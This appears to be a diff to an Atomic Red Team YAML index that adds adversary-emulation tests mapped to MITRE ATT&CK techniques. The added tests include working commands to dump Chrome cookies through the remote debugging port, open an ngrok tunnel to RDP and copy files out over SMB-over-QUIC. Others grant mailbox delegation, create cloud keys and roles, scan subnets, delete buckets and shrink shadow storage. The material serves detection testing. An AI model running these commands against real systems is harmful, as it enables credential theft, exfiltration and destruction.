+          gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
+        cleanup_command: |
+          cd $PathToAtomicsFolder/T1098/src/T1098-17/
+          terraform state rm google_service_account_key.key
+          terraform destroy -auto-approve
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install the terraform.
+
+          '
+      - description: 'Create dependency resources using terraform
+
+          '
+        prereq_command: 'stat $PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate
+
+          '
+        get_prereq_command: |-
+          cd $PathToAtomicsFolder/T1098/src/T1098-17/
+          terraform init
+          terraform apply -auto-approve
  T1547.006:
    technique:
      x_mitre_platforms:
@@ -70503,7 +71185,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -70524,7 +71206,59 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1098.002
+    atomic_tests:
+    - name: EXO - Full access mailbox permission granted to a user
+      auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+      description: |
+        Give a nominated user, full mailbox delegation access of another user.
+        This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+      supported_platforms:
+      - office-365
+      input_arguments:
+        username:
+          description: office-365 username
+          type: string
+          default: o365_user_test@contoso.com
+        password:
+          description: office-365 password
+          type: string
+          default: o365_password_test
+        delegate_target:
+          description: office-365 target_email
+          type: string
+          default: delegate@contoso.com
+        operator_mailbox:
+          description: office-365 target_email
+          type: string
+          default: operator@contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+        get_prereq_command: "Install-Module -Name ExchangeOnlineManagement         \n"
+      executor:
+        command: |
+          Import-Module ExchangeOnlineManagement
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+          Disconnect-ExchangeOnline -Confirm:$false
+        cleanup_command: |
+          Import-Module ExchangeOnlineManagement
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+          Disconnect-ExchangeOnline -Confirm:$false
+        name: powershell
+        elevation_required: false
  T1084:
    technique:
      x_mitre_platforms:
@@ -71043,7 +71777,6 @@ persistence:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -71063,6 +71796,13 @@ persistence:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
    - name: Azure Persistence Automation Runbook Created or Modified
      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
@@ -71143,6 +71883,65 @@ persistence:
          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
          cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/
          terraform destroy -auto-approve
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -73622,6 +74421,48 @@ command-and-control:
          Set-Location PathToAtomicsFolder
          .\T1572\src\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
        name: powershell
+    - name: run ngrok
+      auto_generated_guid: 4cdc9fc7-53fb-4894-9f0c-64836943ea60
+      description: 'Download and run ngrok. Create tunnel to chosen port.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        api_token:
+          description: ngrok API
+          type: string
+          default: N/A
+        port_num:
+          description: port number for tunnel
+          type: integer
+          default: 3389
+        download:
+          description: link to download ngrok
+          type: string
+          default: https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download ngrok
+
+          '
+        prereq_command: 'if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: |
+          New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
+          Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
+          Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
+      executor:
+        command: "C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken #{api_token}
+          | Out-Null\nStart-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
+          tcp #{port_num} } | Out-Null\nStart-Sleep -s 5 \nStop-Job -Name Job1 | Out-Null\n"
+        cleanup_command: |
+          Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
+          Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
  T1483:
    technique:
      x_mitre_platforms:
@@ -76988,7 +77829,7 @@ collection:
          dir
    - name: Compress Data and lock with password for Exfiltration with 7zip
      auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
-      description: 'Note: Requires 7zip installation
+      description: 'Note: This test requires 7zip installation

        '
      supported_platforms:
@@ -77011,7 +77852,7 @@ collection:
          '
        get_prereq_command: |
          echo Downloading 7-zip installer
-          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2301-x64.exe" #{7zip_installer}
          #{7zip_installer} /S
      executor:
        name: command_prompt
@@ -77022,6 +77863,10 @@ collection:
          echo "This file will be encrypted" > .\encrypted_file.txt
          "#{7zip_exe}" u archive.7z *txt -pblue
          dir
+        cleanup_command: 'rmdir /s /Q $PathToAtomicsFolder\T1560.001\victim-files
+          >nul 2>&1
+
+          '
    - name: Data Compressed - nix - zip
      auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
      description: 'An adversary may compress data (e.g., sensitive documents) that
@@ -82804,7 +83649,58 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1570
+    atomic_tests:
+    - name: Exfiltration Over SMB over QUIC (New-SmbMapping)
+      auto_generated_guid: d8d13303-159e-4f33-89f4-9f07812d016f
+      description: |
+        Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
+        Prerequisites:
+          - A file server running Windows Server 2022 Datacenter: Azure Edition
+          - A Windows 11 computer
+          - Windows Admin Center
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: The UNC path to the share on the file server
+          type: string
+          default: "\\\\example.com\\sales"
+        local_file:
+          description: The local file to be transferred
+          type: path
+          default: C:\path\to\file.txt
+      executor:
+        command: |
+          New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
+          copy '#{local_file}' 'Z:\'
+        name: powershell
+        elevation_required: true
+    - name: Exfiltration Over SMB over QUIC (NET USE)
+      auto_generated_guid: 183235ca-8e6c-422c-88c2-3aa28c4825d9
+      description: |
+        Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
+        Prerequisites:
+          - A file server running Windows Server 2022 Datacenter: Azure Edition
+          - A Windows 11 computer
+          - Windows Admin Center
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: The UNC path to the share on the file server
+          type: string
+          default: "\\\\example.com\\sales"
+        local_file:
+          description: The local file to be transferred
+          type: path
+          default: C:\path\to\file.txt
+      executor:
+        command: |
+          NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
+          copy '#{local_file}' '*:\'
+        name: powershell
+        elevation_required: true
  T1184:
    technique:
      x_mitre_platforms:
@@ -83511,10 +84407,10 @@ lateral-movement:
          default: '4489'
      executor:
        command: |
-          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f
+          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
          netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
        cleanup_command: |
-          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
+          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
          netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
          net stop TermService >nul 2>&1
          net start TermService >nul 2>&1
@@ -85157,6 +86053,41 @@ credential-access:
          '
        name: powershell
        elevation_required: false
+    - name: Steal Chrome Cookies via Remote Debugging (Mac)
+      auto_generated_guid: e43cfdaf-3fb8-4a45-8de0-7eee8741d072
+      description: |-
+        The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+        If successful, this test will output a list of cookies.
+
+        Note: Chrome processes will be killed during this test.
+
+        See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+      supported_platforms:
+      - macos
+      dependency_executor_name: bash
+      dependencies:
+      - description: Install Go
+        prereq_command: go version
+        get_prereq_command: brew install go
+      - description: Download and compile WhiteChocolateMacademiaNut
+        prereq_command: "/tmp/WhiteChocolateMacademiaNut/chocolate -h"
+        get_prereq_command: |-
+          git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
+          cd /tmp/WhiteChocolateMacademiaNut
+          go mod init chocolate
+          go mod tidy
+          go build
+      executor:
+        command: |-
+          killall 'Google Chrome'
+          sleep 1
+          open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+          sleep 1
+          /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+        cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
+        name: bash
+        elevation_required: false
  T1003.002:
    technique:
      x_mitre_platforms:
@@ -87652,6 +88583,7 @@ credential-access:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -95864,6 +96796,52 @@ discovery:
        cleanup_command: 
        name: powershell
        elevation_required: false
+    - name: Active Directory Domain Search
+      auto_generated_guid: '096b6d2a-b63f-4100-8fa0-525da4cd25ca'
+      description: 'Output information from LDAPSearch. LDAP Password is the admin-user
+        password on Active Directory
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        user:
+          description: username@domain of a user within the ad database
+          type: string
+          default: user@example.test
+        password:
+          description: password of the user with admin privileges referenced in admin_user
+          type: string
+          default: s3CurePssw0rD!
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapsearch
+
+          '
+        prereq_command: 'which ldapsearch
+
+          '
+        get_prereq_command: 'echo ldapsearch not found
+
+          '
+      executor:
+        elevation_required: false
+        command: 'ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user}
+          -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub
+          -a always -z 1000 dn
+
+          '
+        name: sh
  T1063:
    technique:
      x_mitre_platforms:
@@ -96650,6 +97628,50 @@ discovery:

          '
        name: command_prompt
+    - name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
+      auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2
+      description: 'Output information from LDAPSearch. LDAP Password is the admin-user
+        password on Active Directory
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: com
+        user:
+          description: username@domain of a user
+          type: string
+          default: user@example.com
+        password:
+          description: password of the user referenced inside user
+          type: string
+          default: s3CurePssw0rD!
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapsearch
+
+          '
+        prereq_command: 'which ldapsearch
+
+          '
+        get_prereq_command: 'echo missing ldapsearch command; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: "ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user}
+          -w #{password} -b \"CN=Users,DC=#{domain},DC=#{top_level_domain}\" \"(objectClass=group)\"
+          -s sub -a always -z 1000 dn \n"
+        name: sh
  T1007:
    technique:
      modified: '2023-04-03T18:55:18.326Z'
@@ -98024,6 +99046,20 @@ discovery:
          wmic OS get Caption,OSArchitecture,Version
          wmic DISKDRIVE get Caption
        name: command_prompt
+    - name: Driver Enumeration using DriverQuery
+      auto_generated_guid: bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9
+      description: "Executes the driverquery command to list drivers installed on
+        the system. Adversaries utilize the feature to enumerate the driver and it
+        can be\nused for Exploitation. \ncommand /v - provide verbose output but not
+        valid for signed drivers\n        /si - provide information about signed drivers
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          driverquery /v
+          driverquery /si
+        name: command_prompt
  T1010:
    technique:
      modified: '2023-04-15T16:46:04.776Z'
@@ -98356,6 +99392,7 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -99713,7 +100750,7 @@ discovery:
      description: "This test will enumerate all the S3 buckets in the user account
        and lists all the files in each bucket. \n"
      supported_platforms:
-      - iaas:azure
+      - iaas:aws
      dependencies:
      - description: 'Check if ~/.aws/credentials file has a default stanza is configured

@@ -101959,6 +102996,57 @@ discovery:
          docker stop t1046_container
          docker rmi -f t1046
        name: sh
+    - name: Port-Scanning /24 Subnet with PowerShell
+      auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+      description: |
+        Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+        The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ip_address:
+          description: IP-Address within the target subnet. Default is empty and script
+            tries to determine local IP address of attacking machine.
+          type: string
+          default: ''
+        port_list:
+          description: Comma separated list of ports to scan
+          type: string
+          default: 445, 3389
+        timeout_ms:
+          description: Connection timeout in milliseconds
+          type: string
+          default: '200'
+      executor:
+        command: |
+          $ipAddr = "#{ip_address}"
+          if ($ipAddr -eq "") {
+              # Assumes the "primary" interface is shown at the top
+              $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+              Write-Host "[i] Using Interface $interface"
+              $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+          }
+          Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+          $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+          # Always assumes /24 subnet
+          Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+          $ports = #{port_list}
+          $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+          foreach ($ip in $subnetIPs) {
+              foreach ($port in $ports) {
+                try {
+                    $tcp = New-Object Net.Sockets.TcpClient
+                    $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                } catch {}
+                if ($tcp.Connected) {
+                    $tcp.Close()
+                    Write-Host "Port $port is open on $ip"
+                }
+              }
+          }
+        name: powershell
  T1518:
    technique:
      modified: '2023-03-30T21:01:50.920Z'
@@ -109698,6 +110786,75 @@ impact:

          '
        name: command_prompt
+    - name: GCP - Delete Bucket
+      auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928
+      description: |
+        This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
+
+        Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
+        This atomic will create a bucket then delete the bucket.
+
+        Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project_id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        bucket_name:
+          description: The name of the bucket to delete.
+          type: string
+          default: atomic-red-team-bucket
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project_id}
+          gcloud storage buckets delete gs://#{bucket_name}
+        cleanup_command: |
+          cd $PathToAtomicsFolder/T1485/src/T1485-4/
+          terraform state rm google_storage_bucket.bucket
+          terraform destroy -auto-approve
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install the terraform.
+
+          '
+      - description: 'Create dependency resources using terraform
+
+          '
+        prereq_command: 'stat $PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate
+
+          '
+        get_prereq_command: |-
+          cd $PathToAtomicsFolder/T1485/src/T1485-4/
+          terraform init
+          terraform apply -auto-approve
  T1498:
    technique:
      x_mitre_platforms:
@@ -110093,6 +111250,18 @@ impact:
          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
        name: command_prompt
        elevation_required: true
+    - name: Windows - vssadmin Resize Shadowstorage Volume
+      auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
+      description: Adversaries generally try to Resize Shadowstorage Volume using
+        vssadmin.exe to avoid the shadow volumes being made again. This technique
+        is typically found used by adversaries during a ransomware event and a precursor
+        to deleting the shadowstorage.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+        name: powershell
+        elevation_required: true
  T1561.001:
    technique:
      modified: '2023-04-12T23:42:59.868Z'
@@ -112100,7 +113269,6 @@ initial-access:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -112120,6 +113288,13 @@ initial-access:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
    - name: Azure Persistence Automation Runbook Created or Modified
      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
@@ -112200,6 +113375,65 @@ initial-access:
          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
          cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/
          terraform destroy -auto-approve
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1566.003:
    technique:
      modified: '2023-03-30T21:01:50.401Z'
@@ -3055,7 +3055,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -3082,6 +3082,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -15231,6 +15232,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -15357,6 +15359,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -21328,7 +21331,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -21368,6 +21371,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -37287,7 +37291,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -37390,6 +37394,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -37418,7 +37423,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -37458,6 +37463,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41641,7 +41647,116 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      identifier: T1136.002
-    atomic_tests: []
+    atomic_tests:
+    - name: Active Directory Create Admin Account
+      auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab
+      description: 'Use Admin Credentials to Create A Domain Admin Account
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        admin_user:
+          description: username@domain of a user with admin privileges
+          type: string
+          default: admin@example.test
+        admin_password:
+          description: password of the user with admin privileges referenced in admin_user
+          type: string
+          default: s3CurePssw0rD!
